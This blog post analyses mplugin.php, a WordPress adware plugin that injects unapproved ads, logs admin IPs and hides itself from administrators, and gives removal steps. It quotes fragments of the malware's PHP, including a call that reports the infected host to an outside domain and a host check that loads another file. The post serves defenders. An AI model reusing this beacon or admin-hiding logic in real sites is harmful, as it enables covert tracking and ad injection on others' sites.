Beware of mplugin.PHP Malware: Unapproved Advertisements Displayed on Your WordPress Site

WordPress is the most popular content management system (CMS) on the internet, powering over 40% of all websites. However, its popularity also makes it a target for hackers and cybercriminals. One of the most significant security risks for WordPress sites is malware, and one particular type of malware that site owners need to be aware of is plugin.php malware.

If you are a WordPress website owner, you need to be cautious of the mplugin.PHP malware that can affect your site’s security and display unauthorized ads. This malware can cause severe damage to your site’s reputation, traffic, and revenue. In this article, we will provide you with a detailed overview of the mplugin.PHP malware, how it works, and the measures you can take to protect your site from it. So, let’s dive in and explore the dangers of mplugin.PHP malware and how you can safeguard your WordPress website.

What is mplugin.PHP malware?

If You Found A Hidden File Name mplugin.php Then You Need To Take Care Of Your Website Because This Is A PHP File On Your Back Panel Of WordPress Which Creates Functions Of Showing Ads To Your Website Visitors Without Any Appropriate Permissions From Your Side.

So From The Next Time If You Find This File Then You Should Make Sure That You Firstly Should Remove It Because Running Ads Is A Great Thing But Not every time Without Your Permission.

How does plugin.php malware work?

mplugin.PHP malware works by exploiting vulnerabilities in outdated or poorly coded plugins. Hackers can gain access to a site by exploiting these vulnerabilities and then upload the mplugin.PHP file to the site’s plugins directory. Once the file is on the site, the malware can execute its malicious code.

One of the most common actions of plugin.php malware is to display unwanted ads on the site. These ads can be in the form of pop-ups, banners, or links injected into existing content. The ads are usually related to gambling, adult content, or other questionable products or services.

In addition to displaying unwanted ads, plugin.php malware can also redirect users to phishing sites or steal sensitive information from the site. For example, the malware can intercept login credentials, credit card information, or other personal data entered by users on the site.

See also  How to Protect Your Smart TV from Viruses (Android TV & Samsung)

How to detect mplugin.php malware?

Detecting plugin.php malware can be difficult, as the malware is designed to stay hidden and avoid detection. However, there are some signs that site owners can look for to identify if their site has been infected with mmplugin.php malware.

One of the most obvious signs of plugin.php malware is the presence of unwanted ads on the site. If ads suddenly start appearing on the site without the site owner’s permission, it is a sign that the site may have been infected with mplugin.php malware.

Another sign of mplugin.php malware is a sudden decrease in site speed or performance. Malware can cause the site to slow down or crash, as it consumes resources and disrupts normal site functions.

Site owners can also use security plugins or scanning tools to detect plugin.php malware. These tools can scan the site’s files and detect any suspicious or malicious code.

Recently, a friend of mine informed me that their WordPress site had been acting oddly in the past few days. After conducting an initial investigation, I discovered several files that had been recently created, including mplugin.php and admin_ips.txt. At first glance, these files appeared to be legitimate plugin files and contained basic information similar to other WordPress plugins. However, upon further inspection, I found some suspicious code, such as the following:

if(get_option(‘log_install’) !==’1′){if(!$log_installed = @file_get_contents(“”.$_SERVER[“HTTP_HOST”])){$log_installed = @file_get_contents_mplugin(“”.$_SERVER[“HTTP_HOST”]);}

This code sends the installation status of the plugins to an unknown website, which is highly unusual and concerning.

It is unclear why the code is sending the “HTTP_HOST” variable to the domain. It is possible that the creators of the malware are using this information to track the websites that have been infected or to gather data about the servers hosting the infected websites.

Another suspicious piece of code found in the mplugin.php file is:

$replace_host = array(‘′,’′,’’); $real_host = $_SERVER[‘HTTP_HOST’]; $real_host = str_replace(‘www.’,”,$real_host); if(in_array($real_host,$replace_host)){ if($real_host == ‘’){require_once(‘o.php’);} if($real_host == ‘’){require_once(‘o.php’);} if($real_host == ‘’){require_once(‘o.php’);} }

This code checks whether the “HTTP_HOST” variable matches any of the IP addresses or domain names in the “$replace_host” array. If there is a match, the code requires the “o.php” file, which may contain additional malicious code.

Overall, the presence of the mplugin.php file and its suspicious code on a WordPress site is a cause for concern. It is essential to remove this file and any other related files as soon as possible to prevent further damage to the website and protect sensitive information.

See also  The Hazards of Facial Recognition: Understanding the Risks Involved
Logging WordPress admin IP

It is alarming to discover that the mplugin.php code is designed to create the admin_ips.txt file and store all the public IP addresses used by administrators to log in to their WordPress site. This is a clear violation of users’ privacy and security, as their personal information is being collected without their knowledge or consent.

Upon further investigation, it became evident that the mplugin.php code was also designed to add adware-type malware to the victim WordPress site. The malware is programmed to remain hidden when the IP address is recognized, specifically the IP addresses listed in the admin_ips.txt file. This means that the malware can go unnoticed by the site administrators, allowing it to continue its harmful activities undetected.

It is essential to take immediate action to remove this malware from the affected WordPress site. The longer the malware remains on the site, the more damage it can cause. The malware could potentially compromise sensitive user information, cause performance issues, and harm the site’s reputation. To prevent further harm, it is crucial to delete all related files, including the mplugin.php file, the admin_ips.txt file, and any other files associated with the malware.

Additionally, it is crucial to take proactive measures to protect your WordPress site from future malware attacks. These measures include keeping WordPress and all installed plugins up to date, using strong passwords, implementing two-factor authentication, and regularly scanning your site for any potential security threats. By taking these precautions, you can help ensure the safety and security of your WordPress site and the sensitive information it contains.

Display adware

It is crucial to be aware of the domains associated with this malware attack to prevent further damage to WordPress sites. The following domains were identified as being related to the attack:


It is essential to check your WordPress site immediately if any related domains appear in your plugins, themes, or if any user has registered using these domains. If any related domains are found, it is crucial to take immediate action to remove them and any related files from the site.

See also  How to use aCropalypse to uncover the secrets of your cropped photos on Google Pixel

It is also advisable to block these domains in your site’s firewall to prevent any further connection with them. Additionally, if any related plugins or themes were installed on your site, it is recommended to delete them immediately and replace them with trusted and reputable alternatives.

Finally, it is essential to keep WordPress and all installed plugins and themes up to date to prevent future attacks. Regularly monitoring your site for suspicious activity and taking proactive measures to protect it can help ensure the safety and security of your WordPress site and its users.

How to remove plugin.php malware?

Removing mplugin.php malware can be challenging, as the malware can be deeply embedded in the site’s files and database. However, there are several steps that site owners can take to remove the malware and secure their site.

The first step in removing mplugin.php malware is to identify the compromised plugin and remove it from the site. Site owners should check their list of installed plugins and deactivate or delete any plugins that they did not install or do not recognize.

Next, site owners should scan their site’s files and database for any instances of the mplugin.php file. Security plugins or scanning tools can help with this task, as they can detect any suspicious or malicious code on the site.

Once the malware has been identified, site owners should delete any infected files and restore any clean backups of the site. If the site’s database has been compromised, site owners should restore a clean backup of the database or use a database cleanup tool to remove any malicious code.

Site owners should also update their plugins and WordPress core to the latest version to prevent future malware attacks. They should also consider using a security plugin or service to monitor their site

To identify and remove the new item created in your database tables, you can refer to the following list of settings obtained from the code:

register_setting('mplugin-settings', 'default_mont_options');
register_setting('mplugin-settings', 'ad_code');
register_setting('mplugin-settings', 'hide_admin');
register_setting('mplugin-settings', 'hide_logged_in');
register_setting('mplugin-settings', 'display_ad');
register_setting('mplugin-settings', 'search_engines');
register_setting('mplugin-settings', 'auto_update');
register_setting('mplugin-settings', 'ip_admin');
register_setting('mplugin-settings', 'cookies_admin');
register_setting('mplugin-settings', 'logged_admin');
register_setting('mplugin-settings', 'log_install');


It seems that these settings are stored in the “wp_options” table. You can locate them by their name and remove them one by one.

I hope this information is helpful to WordPress users. This is my first post here, and I’ll be sure to add more topics in the future if I come across anything interesting. Goodbye for now, and stay safe!

5/5 - (111 votes)

Mohamed SAKHRI

I am Mohamed SAKHRI, the creator and editor-in-chief of Tech To Geek, where I've demonstrated my passion for technology through extensive blogging. My expertise spans various operating systems, including Windows, Linux, macOS, and Android, with a focus on providing practical and valuable guides. Additionally, I delve into WordPress-related subjects. You can find more about me on my Linkedin!, Twitter!, Reddit

Leave a Comment